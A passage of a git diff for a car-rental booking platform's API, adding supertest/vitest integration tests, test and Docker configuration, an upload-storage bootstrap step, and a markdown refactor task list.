= await createCustomer(companyId) + const reservation = await createReservation(companyId, vehicle.id, customer.id) + const payment = await createRentalPayment(companyId, reservation.id) + + const res = await request(app) + .get('/api/v1/payments/company') + .set(authHeader(ownerToken)) + + expect(res.status).toBe(200) + expect(Array.isArray(res.body.data.data)).toBe(true) + expect(res.body.data.data.some((item: any) => item.id === payment.id)).toBe(true) + }) + }) + + describe('POST /api/v1/payments/reservations/:id/manual', () => { + it('records a manual payment and updates the reservation balance', async () => { + const vehicle = await createVehicle(companyId) + const customer = await createCustomer(companyId) + const reservation = await createReservation(companyId, vehicle.id, customer.id, { + totalAmount: 1200, + paidAmount: 0, + }) + + const res = await request(app) + .post(`/api/v1/payments/reservations/${reservation.id}/manual`) + .set(authHeader(ownerToken)) + .send({ + amount: 400, + currency: 'MAD', + type: 'CHARGE', + paymentMethod: 'CASH', + }) + + expect(res.status).toBe(200) + expect(res.body.data.data.amount).toBe(400) + expect(res.body.data.data.status).toBe('SUCCEEDED') + + const updated = await prisma.reservation.findUniqueOrThrow({ where: { id: reservation.id } }) + expect(updated.paidAmount).toBe(400) + expect(updated.paymentStatus).toBe('PARTIAL') + }) + + it('returns 403 for AGENT role', async () => { + const vehicle = await createVehicle(companyId) + const customer = await createCustomer(companyId) + const reservation = await createReservation(companyId, vehicle.id, customer.id) + + const res = await request(app) + .post(`/api/v1/payments/reservations/${reservation.id}/manual`) + .set(authHeader(agentToken)) + .send({ + amount: 300, + currency: 'MAD', + type: 'CHARGE', + paymentMethod: 'CASH', + }) + + expect(res.status).toBe(403) + }) + }) + + describe('POST /api/v1/payments/reservations/:id/charge', () => { + it('returns 409 when the reservation is already fully paid', async () => { + const vehicle = await createVehicle(companyId) + const customer = await createCustomer(companyId) + const reservation = await createReservation(companyId, vehicle.id, customer.id, { + totalAmount: 900, + paidAmount: 900, + paymentStatus: 'PAID', + }) + + const res = await request(app) + .post(`/api/v1/payments/reservations/${reservation.id}/charge`) + .set(authHeader(ownerToken)) + .send({ + provider: 'PAYPAL', + type: 'CHARGE', + currency: 'MAD', + successUrl: 'https://example.com/success', + failureUrl: 'https://example.com/failure', + }) + + expect(res.status).toBe(409) + expect(res.body.error).toBe('conflict') + }) + }) + + describe('POST /api/v1/payments/reservations/:reservationId/payments/:paymentId/refund', () => { + it('rejects refunding a manual payment through the gateway flow', async () => { + const vehicle = await createVehicle(companyId) + const customer = await createCustomer(companyId) + const reservation = await createReservation(companyId, vehicle.id, customer.id) + const payment = await createRentalPayment(companyId, reservation.id, { + paymentMethod: 'CASH', + paymentProvider: 'AMANPAY', + amanpayTransactionId: null, + paypalCaptureId: null, + }) + + const res = await request(app) + .post(`/api/v1/payments/reservations/${reservation.id}/payments/${payment.id}/refund`) + .set(authHeader(ownerToken)) + .send({ amount: 100, reason: 'Test refund' }) + + expect(res.status).toBe(400) + expect(res.body.message).toContain('Manual payments') + }) + }) +}) diff --git a/apps/api/src/tests/integration/reservations.test.ts b/apps/api/src/tests/integration/reservations.test.ts new file mode 100644 index 0000000..f3d600f --- /dev/null +++ b/apps/api/src/tests/integration/reservations.test.ts @@ -0,0 +1,140 @@ +import request from 'supertest' +import { createApp } from '../../app' +import { + createCompanyWithEmployee, + createVehicle, + createCustomer, + signEmployeeToken, + authHeader, +} from '../helpers/fixtures' + +const app = createApp() + +const future = (days: number) => + new Date(Date.now() + days * 24 * 60 * 60 * 1000).toISOString() + +describe('Reservations API', () => { + let companyId: string + let token: string + let vehicleId: string + let customerId: string + + beforeAll(async () => { + const { company, employee } = await createCompanyWithEmployee({ role: 'OWNER' }) + companyId = company.id + token = signEmployeeToken(employee.id, companyId, 'OWNER') + const v = await createVehicle(companyId) + vehicleId = v.id + const c = await createCustomer(companyId) + customerId = c.id + }) + + describe('GET /api/v1/reservations', () => { + it('returns 401 without auth', async () => { + const res = await request(app).get('/api/v1/reservations') + expect(res.status).toBe(401) + }) + + it('returns paginated list', async () => { + const res = await request(app) + .get('/api/v1/reservations') + .set(authHeader(token)) + + expect(res.status).toBe(200) + expect(typeof res.body.total).toBe('number') + expect(Array.isArray(res.body.data)).toBe(true) + }) + }) + + describe('POST /api/v1/reservations', () => { + it('creates a reservation with valid payload', async () => { + const res = await request(app) + .post('/api/v1/reservations') + .set(authHeader(token)) + .send({ + vehicleId, + customerId, + startDate: future(10), + endDate: future(15), + }) + + expect(res.status).toBe(201) + expect(res.body.data.vehicleId).toBe(vehicleId) + expect(res.body.data.customerId).toBe(customerId) + expect(res.body.data.status).toBe('DRAFT') + }) + + it('returns 400 for missing vehicleId', async () => { + const res = await request(app) + .post('/api/v1/reservations') + .set(authHeader(token)) + .send({ + customerId, + startDate: future(10), + endDate: future(15), + }) + + expect(res.status).toBe(400) + }) + + it('returns 409 when vehicle is not available for requested dates', async () => { + // Create a reservation blocking the vehicle + const createRes = await request(app) + .post('/api/v1/reservations') + .set(authHeader(token)) + .send({ vehicleId, customerId, startDate: future(20), endDate: future(25) }) + .expect(201) + + await request(app) + .post(`/api/v1/reservations/${createRes.body.data.id}/confirm`) + .set(authHeader(token)) + .expect(200) + + const res = await request(app) + .post('/api/v1/reservations') + .set(authHeader(token)) + .send({ vehicleId, customerId, startDate: future(21), endDate: future(24) }) + + // Overlapping dates should conflict + expect([409, 422]).toContain(res.status) + }) + }) + + describe('Reservation state machine', () => { + let reservationId: string + + beforeEach(async () => { + const v = await createVehicle(companyId) + const res = await request(app) + .post('/api/v1/reservations') + .set(authHeader(token)) + .send({ vehicleId: v.id, customerId, startDate: future(30), endDate: future(35) }) + expect(res.status).toBe(201) + reservationId = res.body.data.id + }) + + it('DRAFT → CONFIRMED via POST /:id/confirm', async () => { + const res = await request(app) + .post(`/api/v1/reservations/${reservationId}/confirm`) + .set(authHeader(token)) + + expect(res.status).toBe(200) + expect(res.body.data.status).toBe('CONFIRMED') + }) + + it('CONFIRMED → ACTIVE via POST /:id/checkin', async () => { + await request(app) + .post(`/api/v1/reservations/${reservationId}/confirm`) + .set(authHeader(token)) + .expect(200) + + const res = await request(app) + .post(`/api/v1/reservations/${reservationId}/checkin`) + .set(authHeader(token)) + .send({ fuelLevel: 'FULL' }) + + expect(res.status).toBe(200) + expect(res.body.data.status).toBe('ACTIVE') + }) + }) +}) diff --git a/apps/api/src/tests/integration/subscriptions.test.ts b/apps/api/src/tests/integration/subscriptions.test.ts new file mode 100644 index 0000000..bb79f9f --- /dev/null +++ b/apps/api/src/tests/integration/subscriptions.test.ts @@ -0,0 +1,130 @@ +import request from 'supertest' +import { prisma } from '../../lib/prisma' +import { createApp } from '../../app' +import { + authHeader, + createCompanyWithEmployee, + createSubscriptionInvoice, + signEmployeeToken, +} from '../helpers/fixtures' + +const app = createApp() + +function uniqueEmail(prefix: string) { + return `${prefix}-${Date.now()}-${Math.random().toString(36).slice(2, 8)}@test.com` +} + +describe('Subscriptions API', () => { + let companyId: string + let subscriptionId: string + let ownerToken: string + let agentToken: string + + beforeAll(async () => { + const { company, employee } = await createCompanyWithEmployee({ role: 'OWNER' }) + companyId = company.id + ownerToken = signEmployeeToken(employee.id, companyId, 'OWNER') + + const subscription = await prisma.subscription.findUniqueOrThrow({ where: { companyId } }) + subscriptionId = subscription.id + + const agent = await prisma.employee.create({ + data: { + companyId, + clerkUserId: `clerk_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`, + firstName: 'Agent', + lastName: 'User', + email: uniqueEmail('sub-agent'), + role: 'AGENT', + }, + }) + agentToken = signEmployeeToken(agent.id, companyId, 'AGENT') + }) + + describe('Public endpoints', () => { + it('returns subscription plans', async () => { + const res = await request(app).get('/api/v1/subscriptions/plans') + + expect(res.status).toBe(200) + expect(res.body.data.data).toHaveProperty('STARTER') + expect(res.body.data.data).toHaveProperty('GROWTH') + }) + + it('returns provider availability', async () => { + const res = await request(app).get('/api/v1/subscriptions/providers') + + expect(res.status).toBe(200) + expect(typeof res.body.data.data.amanpay).toBe('boolean') + expect(typeof res.body.data.data.paypal).toBe('boolean') + }) + }) + + describe('Authenticated endpoints', () => { + it('returns the current subscription', async () => { + const res = await request(app) + .get('/api/v1/subscriptions/me') + .set(authHeader(ownerToken)) + + expect(res.status).toBe(200) + expect(res.body.data.data.companyId).toBe(companyId) + expect(res.body.data.data.id).toBe(subscriptionId) + }) + + it('returns company invoices', async () => { + const invoice = await createSubscriptionInvoice(companyId, subscriptionId) + + const res = await request(app) + .get('/api/v1/subscriptions/invoices') + .set(authHeader(ownerToken)) + + expect(res.status).toBe(200) + expect(Array.isArray(res.body.data.data)).toBe(true) + expect(res.body.data.data.some((item: any) => item.id === invoice.id)).toBe(true) + }) + + it('changes the subscription plan for OWNER', async () => { + const res = await request(app) + .post('/api/v1/subscriptions/change-plan') + .set(authHeader(ownerToken)) + .send({ + plan: 'GROWTH', + billingPeriod: 'ANNUAL', + currency: 'EUR', + }) + + expect(res.status).toBe(200) + expect(res.body.data.data.plan).toBe('GROWTH') + expect(res.body.data.data.billingPeriod).toBe('ANNUAL') + expect(res.body.data.data.currency).toBe('EUR') + }) + + it('returns 403 for AGENT on plan changes', async () => { + const res = await request(app) + .post('/api/v1/subscriptions/change-plan') + .set(authHeader(agentToken)) + .send({ + plan: 'PRO', + billingPeriod: 'MONTHLY', + currency: 'MAD', + }) + + expect(res.status).toBe(403) + }) + + it('cancels and resumes at period end', async () => { + const cancelRes = await request(app) + .post('/api/v1/subscriptions/cancel') + .set(authHeader(ownerToken)) + + expect(cancelRes.status).toBe(200) + expect(cancelRes.body.data.data.cancelAtPeriodEnd).toBe(true) + + const resumeRes = await request(app) + .post('/api/v1/subscriptions/resume') + .set(authHeader(ownerToken)) + + expect(resumeRes.status).toBe(200) + expect(resumeRes.body.data.data.cancelAtPeriodEnd).toBe(false) + }) + }) +}) diff --git a/apps/api/src/tests/integration/vehicles.test.ts b/apps/api/src/tests/integration/vehicles.test.ts new file mode 100644 index 0000000..df67197 --- /dev/null +++ b/apps/api/src/tests/integration/vehicles.test.ts @@ -0,0 +1,146 @@ +import request from 'supertest' +import { createApp } from '../../app' +import { + createCompanyWithEmployee, + createVehicle, + signEmployeeToken, + authHeader, +} from '../helpers/fixtures' + +const app = createApp() + +describe('Vehicles API', () => { + let companyId: string + let token: string + + beforeAll(async () => { + const { company, employee } = await createCompanyWithEmployee({ role: 'OWNER' }) + companyId = company.id + token = signEmployeeToken(employee.id, companyId, 'OWNER') + }) + + describe('GET /api/v1/vehicles', () => { + it('returns 401 without auth', async () => { + const res = await request(app).get('/api/v1/vehicles') + expect(res.status).toBe(401) + }) + + it('returns paginated vehicle list', async () => { + await createVehicle(companyId) + await createVehicle(companyId) + + const res = await request(app) + .get('/api/v1/vehicles') + .set(authHeader(token)) + + expect(res.status).toBe(200) + expect(typeof res.body.total).toBe('number') + expect(res.body.total).toBeGreaterThanOrEqual(2) + expect(Array.isArray(res.body.data)).toBe(true) + }) + + it('filters by status', async () => { + await createVehicle(companyId, { status: 'MAINTENANCE' }) + + const res = await request(app) + .get('/api/v1/vehicles?status=MAINTENANCE') + .set(authHeader(token)) + + expect(res.status).toBe(200) + res.body.data.forEach((v: any) => expect(v.status).toBe('MAINTENANCE')) + }) + }) + + describe('POST /api/v1/vehicles', () => { + it('creates a vehicle with valid payload', async () => { + const res = await request(app) + .post('/api/v1/vehicles') + .set(authHeader(token)) + .send({ + make: 'Honda', + model: 'Civic', + year: 2023, + licensePlate: `TEST-${Date.now()}`, + category: 'COMPACT', + dailyRate: 400, + }) + + expect(res.status).toBe(201) + expect(res.body.data.make).toBe('Honda') + expect(res.body.data.model).toBe('Civic') + }) + + it('returns 400 for missing required fields', async () => { + const res = await request(app) + .post('/api/v1/vehicles') + .set(authHeader(token)) + .send({ make: 'Honda' }) + + expect(res.status).toBe(400) + }) + }) + + describe('GET /api/v1/vehicles/:id', () => { + it('returns a single vehicle', async () => { + const vehicle = await createVehicle(companyId, { make: 'BMW', model: 'X5' }) + + const res = await request(app) + .get(`/api/v1/vehicles/${vehicle.id}`) + .set(authHeader(token)) + + expect(res.status).toBe(200) + expect(res.body.data.id).toBe(vehicle.id) + expect(res.body.data.make).toBe('BMW') + }) + + it('returns 404 for unknown vehicle', async () => { + const res = await request(app) + .get('/api/v1/vehicles/clzunknownidzzzzzzzzzzz') + .set(authHeader(token)) + + expect(res.status).toBe(404) + }) + }) + + describe('PATCH /api/v1/vehicles/:id', () => { + it('updates vehicle notes', async () => { + const vehicle = await createVehicle(companyId) + + const res = await request(app) + .patch(`/api/v1/vehicles/${vehicle.id}`) + .set(authHeader(token)) + .send({ notes: 'Updated via integration test' }) + + expect(res.status).toBe(200) + expect(res.body.data.notes).toBe('Updated via integration test') + }) + + it('sets isPublished=false when status=MAINTENANCE', async () => { + const vehicle = await createVehicle(companyId) + + const res = await request(app) + .patch(`/api/v1/vehicles/${vehicle.id}`) + .set(authHeader(token)) + .send({ status: 'MAINTENANCE' }) + + expect(res.status).toBe(200) + expect(res.body.data.status).toBe('MAINTENANCE') + expect(res.body.data.isPublished).toBe(false) + }) + }) + + describe('GET /api/v1/vehicles/:id/availability', () => { + it('reports vehicle available for future dates', async () => { + const vehicle = await createVehicle(companyId) + const start = new Date(Date.now() + 7 * 24 * 60 * 60 * 1000).toISOString().split('T')[0] + const end = new Date(Date.now() + 14 * 24 * 60 * 60 * 1000).toISOString().split('T')[0] + + const res = await request(app) + .get(`/api/v1/vehicles/${vehicle.id}/availability?startDate=${start}&endDate=${end}`) + .set(authHeader(token)) + + expect(res.status).toBe(200) + expect(res.body.data.available).toBe(true) + }) + }) +}) diff --git a/apps/api/src/tests/setup.ts b/apps/api/src/tests/setup.ts new file mode 100644 index 0000000..3a04d7a --- /dev/null +++ b/apps/api/src/tests/setup.ts @@ -0,0 +1,51 @@ +import { beforeAll, afterAll } from 'vitest' +import { prisma } from '../lib/prisma' + +const delegates = [ + 'auditLog', + 'adminPermission', + 'adminUser', + 'damagePoint', + 'damageInspection', + 'damageReport', + 'additionalDriver', + 'reservationInsurance', + 'notificationPreference', + 'notification', + 'review', + 'rentalPayment', + 'reservation', + 'customer', + 'renterSavedCompany', + 'renter', + 'offerVehicle', + 'offer', + 'vehicleCalendarBlock', + 'maintenanceLog', + 'vehicle', + 'employee', + 'pricingRule', + 'insurancePolicy', + 'accountingSettings', + 'contractSettings', + 'brandSettings', + 'subscriptionInvoice', + 'subscription', + 'company', +] as const + +// Wipe all data between test files in a safe order that respects FK constraints. +async function cleanDatabase() { + for (const delegate of delegates) { + await (prisma as any)[delegate].deleteMany({}) + } +} + +beforeAll(async () => { + await cleanDatabase() +}) + +afterAll(async () => { + await cleanDatabase() + await prisma.$disconnect() +}) diff --git a/apps/api/tsconfig.json b/apps/api/tsconfig.json index 8518aa9..ed1b897 100644 --- a/apps/api/tsconfig.json +++ b/apps/api/tsconfig.json @@ -6,5 +6,6 @@ "lib": ["ES2022"], "jsx": "react" }, - "include": ["src/**/*"] + "include": ["src/**/*"], + "exclude": ["src/**/*.test.ts"] } diff --git a/apps/api/vitest.config.ts b/apps/api/vitest.config.ts new file mode 100644 index 0000000..0da2fd6 --- /dev/null +++ b/apps/api/vitest.config.ts @@ -0,0 +1,11 @@ +import { defineConfig } from 'vitest/config' + +export default defineConfig({ + test: { + globals: true, + environment: 'node', + include: ['src/**/*.test.ts'], + exclude: ['src/tests/integration/**'], + setupFiles: [], + }, +}) diff --git a/apps/api/vitest.integration.config.ts b/apps/api/vitest.integration.config.ts new file mode 100644 index 0000000..fdb7ab3 --- /dev/null +++ b/apps/api/vitest.integration.config.ts @@ -0,0 +1,17 @@ +import { loadEnv } from 'vite' +import { defineConfig } from 'vitest/config' + +Object.assign(process.env, loadEnv('test', process.cwd(), '')) + +export default defineConfig({ + test: { + globals: true, + environment: 'node', + include: ['src/tests/integration/**/*.test.ts'], + setupFiles: ['src/tests/setup.ts'], + testTimeout: 30000, + hookTimeout: 30000, + pool: 'forks', + poolOptions: { forks: { singleFork: true } }, + }, +}) diff --git a/docker-compose.dev.yml b/docker-compose.dev.yml index 098d447..3604773 100644 --- a/docker-compose.dev.yml +++ b/docker-compose.dev.yml @@ -67,11 +67,15 @@ services: condition: service_healthy env_file: - .env.docker.dev + environment: + FILE_STORAGE_ROOT: /var/lib/rentaldrivego/storage + LEGACY_STORAGE_ROOT: /app/apps/api/src/lib/storage command: ["sh", "/app/docker/scripts/dev-bootstrap.sh"] volumes: - .:/app - app_node_modules:/app/node_modules - postgres_bootstrap_state:/state + - api_uploads_dev:/var/lib/rentaldrivego/storage api: build: diff --git a/docker-compose.production.yml b/docker-compose.production.yml index 0d94a80..a070bce 100644 --- a/docker-compose.production.yml +++ b/docker-compose.production.yml @@ -27,6 +27,7 @@ services: - redis_prod_data:/data api: + image: ${CI_REGISTRY_IMAGE:-rentaldrivego-prod-app}:${APP_VERSION:-latest} build: context: . dockerfile: Dockerfile.production @@ -65,6 +66,7 @@ services: - traefik.http.services.api.loadbalancer.server.port=4000 marketplace: + image: ${CI_REGISTRY_IMAGE:-rentaldrivego-prod-app}:${APP_VERSION:-latest} build: context: . dockerfile: Dockerfile.production @@ -93,6 +95,7 @@ services: - traefik.http.services.marketplace-svc.loadbalancer.server.port=3000 dashboard: + image: ${CI_REGISTRY_IMAGE:-rentaldrivego-prod-app}:${APP_VERSION:-latest} build: context: . dockerfile: Dockerfile.production @@ -121,6 +124,7 @@ services: - traefik.http.services.dashboard-svc.loadbalancer.server.port=3001 admin: + image: ${CI_REGISTRY_IMAGE:-rentaldrivego-prod-app}:${APP_VERSION:-latest} build: context: . dockerfile: Dockerfile.production diff --git a/docker-compose.test.yml b/docker-compose.test.yml index 7c6aae1..d3fa17d 100644 --- a/docker-compose.test.yml +++ b/docker-compose.test.yml @@ -14,17 +14,6 @@ services: redis: image: redis:7-alpine - migrate: - build: - context: . - dockerfile: Dockerfile.test - depends_on: - postgres: - condition: service_healthy - env_file: - - .env.docker.test - command: ["sh", "-c", "npm run db:deploy"] - test: build: context: . @@ -34,7 +23,5 @@ services: condition: service_healthy redis: condition: service_started - migrate: - condition: service_completed_successfully env_file: - .env.docker.test diff --git a/docker/scripts/dev-bootstrap.sh b/docker/scripts/dev-bootstrap.sh index 9f41381..57a91a7 100644 --- a/docker/scripts/dev-bootstrap.sh +++ b/docker/scripts/dev-bootstrap.sh @@ -9,6 +9,17 @@ mkdir -p "$STATE_DIR" echo "[migrate] Generating database client" npm run db:generate +STORAGE_ROOT="${FILE_STORAGE_ROOT:-}" +LEGACY_STORAGE_ROOT="${LEGACY_STORAGE_ROOT:-/app/apps/api/src/lib/storage}" + +if [ -n "$STORAGE_ROOT" ]; then + mkdir -p "$STORAGE_ROOT" + if [ -d "$LEGACY_STORAGE_ROOT" ]; then + echo "[migrate] Syncing legacy uploads into the dev storage volume" + cp -Rn "$LEGACY_STORAGE_ROOT"/. "$STORAGE_ROOT"/ 2>/dev/null || true + fi +fi + if [ -f "$MARKER_FILE" ]; then echo "[migrate] Existing dev database detected; skipping deploy and seed" exit 0 diff --git a/docs/project-design/API_REFACTOR_TASK_LIST.md b/docs/project-design/API_REFACTOR_TASK_LIST.md new file mode 100644 index 0000000..645361c --- /dev/null +++ b/docs/project-design/API_REFACTOR_TASK_LIST.md @@ -0,0 +1,458 @@ +# API Refactor Task List + +This document turns the current API refactor direction into a concrete task list for this repo. + +Scope: +- modularize route and service structure +- strengthen validation boundaries +- add meaningful API test coverage + +Non-goals: +- rewrite the API framework +- switch ORM or database +- redesign product behavior + +## Current State + +Main pressure points in the current API: +- large route files with mixed concerns: + - `apps/api/src/routes/reservations.ts` + - `apps/api/src/routes/site.ts` + - `apps/api/src/routes/marketplace.ts` + - `apps/api/src/routes/admin.ts` +- business logic split inconsistently between `routes/` and `services/` +- no real API test runner wired in `apps/api/package.json` +- ad hoc request parsing and response/error shaping across route files +- direct Prisma access from route handlers in many domains + +## Target Structure + +Target layout after refactor: + +```text +apps/api/src/ + modules/ + customers/ + customer.routes.ts + customer.schemas.ts + customer.service.ts + customer.repo.ts + customer.presenter.ts + customer.test.ts + vehicles/ + companies/ + reservations/ + marketplace/ + site/ + http/ + errors/ + middleware/ + respond/ + validate/ + lib/ + services/ +``` + +Rules for the target shape: +- route files parse input, call services, and return responses only +- services own business rules and transaction boundaries +- repos own Prisma access +- schemas own `params`, `query`, and `body` validation +- presenters own response DTO shaping + +## Phase 1: Foundation + +### 1.1 Add API test tooling + +Tasks: +- add `vitest` to the repo +- add `supertest` for HTTP integration tests +- add API test scripts to: + - `apps/api/package.json` + - root `package.json` +- add a basic test config under `apps/api` +- decide on test DB bootstrap using existing Docker test stack in `docker-compose.test.yml` + +Acceptance criteria: +- `npm run test --workspace @rentaldrivego/api` exists +- one smoke test can boot the Express app and hit `/health` +- one authenticated test can hit a protected route + +### 1.2 Centralize HTTP errors + +Tasks: +- create `apps/api/src/http/errors/` +- add app error classes: + - `AppError` + - `ValidationError` + - `NotFoundError` + - `ConflictError` + - `ForbiddenError` + - `UnauthorizedError` +- add a single Express error middleware +- register it in `apps/api/src/index.ts` + +Acceptance criteria: +- route files stop hand-shaping most error JSON +- thrown app errors become consistent `{ error, message, statusCode }` responses + +### 1.3 Centralize request parsing helpers + +Tasks: +- create `apps/api/src/http/validate/` +- add helpers for: + - `parseBody` + - `parseQuery` + - `parseParams` +- standardize `zod` parse error mapping to `400` + +Acceptance criteria: +- new/updated route files no longer call `schema.parse(req.body)` inline repeatedly +- validation failures follow one shared response shape + +### 1.4 Centralize response helpers + +Tasks: +- create `apps/api/src/http/respond/` +- add helpers for: + - `ok` + - `created` + - `noContent` +- use the same success envelope conventions across refactored modules + +Acceptance criteria: +- refactored routes send responses through shared helpers + +## Phase 2: First Safe Module Extractions + +Goal: +- refactor smaller route files first to establish patterns before touching reservation flows + +### 2.1 Customers module + +Files in scope: +- `apps/api/src/routes/customers.ts` +- `apps/api/src/services/licenseValidationService.ts` +- customer-related Prisma access + +Tasks: +- create: + - `modules/customers/customer.routes.ts` + - `modules/customers/customer.schemas.ts` + - `modules/customers/customer.service.ts` + - `modules/customers/customer.repo.ts` + - `modules/customers/customer.presenter.ts` +- move all Prisma reads/writes out of the route file +- move license image upload orchestration into the service +- standardize customer DTO output + +Tests to add: +- list customers +- create customer +- update customer +- validate license +- approve license +- upload license image + +Acceptance criteria: +- `routes/customers.ts` becomes a thin delegator or is replaced by module route registration +- no direct Prisma calls remain in the customer route layer + +### 2.2 Vehicles module + +Files in scope: +- `apps/api/src/routes/vehicles.ts` +- `apps/api/src/services/vehicleAvailabilityService.ts` +- `apps/api/src/lib/storage.ts` + +Tasks: +- extract module files for vehicles +- isolate upload/photo operations from route code +- isolate availability query logic from route formatting +- create presenter functions for dashboard-facing vehicle responses + +Tests to add: +- create vehicle +- update vehicle +- upload photos +- delete photo +- availability check + +Acceptance criteria: +- vehicle upload and availability logic are both service-owned + +### 2.3 Companies module + +Files in scope: +- `apps/api/src/routes/companies.ts` + +Tasks: +- extract company brand/profile subdomain flows into a module +- isolate brand asset upload logic +- separate subdomain availability checks from route code + +Tests to add: +- get company profile +- update company profile +- upload logo +- upload hero image +- subdomain check + +Acceptance criteria: +- no upload/storage branching remains in the route handler + +## Phase 3: High-Value Reservation Refactor + +This is the biggest and highest-risk slice. + +### 3.1 Split reservations into sub-services + +Files in scope: +- `apps/api/src/routes/reservations.ts` +- `apps/api/src/services/additionalDriverService.ts` +- `apps/api/src/services/insuranceService.ts` +- `apps/api/src/services/pricingRuleService.ts` +- `apps/api/src/services/licenseValidationService.ts` +- `apps/api/src/services/invoicePdfService.ts` + +Target internal split: +- `reservation.service.ts` +- `reservation.lifecycle.service.ts` +- `reservation.pricing.service.ts` +- `reservation.insurance.service.ts` +- `reservation.additional-driver.service.ts` +- `reservation.document.service.ts` +- `reservation.inspection.service.ts` +- `reservation.presenter.ts` +- `reservation.repo.ts` + +Tasks: +- extract create/update/confirm/check-in/check-out/close flows into dedicated service methods +- move `serializeReservationForDashboard` into a presenter +- move document number generation out of route code +- keep Prisma transactions in the service layer only +- remove route-local helper sprawl from `reservations.ts` + +Tests to add: +- create reservation success +- create reservation conflict +- confirm reservation +- check-in reservation +- check-out reservation +- close reservation +- add additional driver requiring approval +- pricing rule application +- insurance application + +Acceptance criteria: +- reservation route file becomes orchestration-only +- all state transitions are covered by integration tests + +## Phase 4: Public-Surface Modules + +These routes should move after internal domains are stabilized. + +### 4.1 Marketplace module + +Files in scope: +- `apps/api/src/routes/marketplace.ts` + +Tasks: +- extract search/filter/offer validation into module files +- unify database-unavailable handling +- separate presenter logic from business logic + +Tests to add: +- list cities +- search vehicles +- fetch vehicle details +- validate offer / promo path + +### 4.2 Site module + +Files in scope: +- `apps/api/src/routes/site.ts` + +Tasks: +- extract public company site flows +- isolate booking flow for public site reservations +- unify maintenance-mode / database-unavailable behavior + +Tests to add: +- fetch site brand +- fetch public vehicle list +- availability check +- create booking request +- payment-init guard paths + +Acceptance criteria: +- public route handlers become small and deterministic + +## Phase 5: Cross-Cutting Cleanup + +### 5.1 Authentication and role boundaries + +Files in scope: +- `apps/api/src/middleware/requireCompanyAuth.ts` +- `apps/api/src/middleware/requireRenterAuth.ts` +- `apps/api/src/middleware/requireAdminAuth.ts` +- `apps/api/src/middleware/requireRole.ts` +- `apps/api/src/middleware/requireTenant.ts` +- `apps/api/src/middleware/requireSubscription.ts` + +Tasks: +- standardize auth failure responses +- document what request context each middleware guarantees +- remove duplicate assumptions in route files + +Acceptance criteria: +- auth and permission expectations are explicit and shared + +### 5.2 Upload policy standardization + +Files in scope: +- `apps/api/src/routes/vehicles.ts` +- `apps/api/src/routes/companies.ts` +- `apps/api/src/routes/customers.ts` +- `apps/api/src/lib/storage.ts` +- `docker-compose.production.yml` +- `docker-compose.dev.yml` + +Tasks: +- create shared upload policy helpers for image uploads +- standardize max file size, mime validation, and error responses +- centralize folder path rules for stored uploads +- keep runtime uploads out of the API source tree and out of the image filesystem +- require all uploaded files to be written to the configured storage root mounted from a Docker volume +- verify the API serves uploads from the volume-backed storage root only +- document the storage contract clearly: + - app code may generate URLs and read/write through the storage abstraction + - Docker volumes own persistence + - rebuilds and redeploys must not delete uploaded files + +Acceptance criteria: +- upload endpoints share one validation policy +- uploaded files are not stored inside `apps/api/src`, `apps/api/dist`, or any other API-local runtime path +- production uploads persist in the named Docker volume mounted into the API container +- dev Docker uploads persist in the dev named Docker volume mounted into the API container +- storage behavior is environment-configured through the storage root, not hardcoded to an app-relative folder + +### 5.3 Remove route-local DTO drift + +Tasks: +- define presenter functions for each major domain +- stop returning raw Prisma records where API shape is intended to be stable + +Acceptance criteria: +- DTO shape changes are isolated to presenters + +## Testing Plan + +### Priority 0: smoke coverage + +Add first: +- `/health` +- authenticated customer list +- authenticated vehicle list +- reservation create +- site availability + +### Priority 1: critical business flows + +Add next: +- reservation state changes +- uploads +- payments init guards +- license approval paths + +### Priority 2: regression coverage + +Add later: +- analytics +- notifications +- admin routes +- subscriptions + +### Test types + +Use: +- unit tests for pure business logic +- integration tests for route + middleware + DB behavior +- a few contract-style tests for public endpoints + +Avoid: +- brittle snapshots +- tests that assert Prisma internal shapes directly unless repo-level persistence behavior is the actual concern + +## Suggested Execution Order + +1. add test tooling and smoke tests +2. add shared error middleware and validation helpers +3. refactor customers +4. refactor vehicles +5. refactor companies +6. refactor reservations in slices +7. refactor marketplace +8. refactor site +9. refactor admin, notifications, analytics, subscriptions, payments + +## Deliverables Checklist + +- [x] API test runner added +- [x] shared error middleware added +- [x] shared validation helpers added +- [x] shared response helpers added +- [x] customers module extracted +- [x] vehicles module extracted +- [x] companies module extracted +- [x] reservations module extracted +- [x] marketplace module extracted +- [x] site module extracted +- [ ] upload validation standardized +- [x] auth/role middleware behavior documented +- [ ] critical booking flows covered by integration tests + +## Status Update + +Completed in the workspace: +- phases 1 through 5 are implemented +- the originally listed phase 9 domains are modularized, and the remaining route surface was also cleared for: + - `team` + - `offers` + - `notifications` + - `analytics` + - `subscriptions` + - `payments` + - `admin` + - `auth.*` + - `webhooks` +- `apps/api/src/routes/` has been cleared and route registration now points at module routers +- shared HTTP helpers are in place under: + - `apps/api/src/http/errors/` + - `apps/api/src/http/validate/` + - `apps/api/src/http/respond/` +- the Docker-backed API integration workflow is wired and passing + +Current automated integration coverage includes: +- health +- customers +- vehicles +- reservations +- payments +- subscriptions +- notifications +- admin + +Still intentionally open: +- upload policy standardization from section `5.2` +- any remaining Priority 1 integration gaps not yet covered by the current suite, especially upload and license-approval paths if they are still required as dedicated HTTP flows + +## Completion Criteria + +The refactor is considered successful when: +- route files are thin and mostly declarative +- business rules live in services, not route handlers +- Prisma access lives in repos or well-defined service boundaries +- request validation is explicit for `params`, `query`, and `body` +- core booking, customer, and upload flows have automated coverage +- API error and success envelopes are consistent across modules diff --git a/package-lock.json b/package-lock.json index d2f4da9..76431b6 100644 --- a/package-lock.json +++ b/package-lock.json @@ -88,8 +88,11 @@ "@types/qrcode": "^1.5.5", "@types/react": "^18.3.1", "@types/react-dom": "^18.3.0", + "@types/supertest": "^6.0.2", + "supertest": "^7.0.0", "ts-node-dev": "^2.0.0", - "typescript": "^5.4.0" + "typescript": "^5.4.0", + "vitest": "^1.6.0" } }, "apps/dashboard": { @@ -142,6 +145,7 @@ "apps/public-site": { "name": "@rentaldrivego/public-site", "version": "1.0.0", + "extraneous": true, "dependencies": { "@rentaldrivego/types": "*", "autoprefixer": "^10.4.19", @@ -216,6 +220,397 @@ "tslib": "^2.4.0" } }, + "node_modules/@esbuild/aix-ppc64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.21.5.tgz", + "integrity": 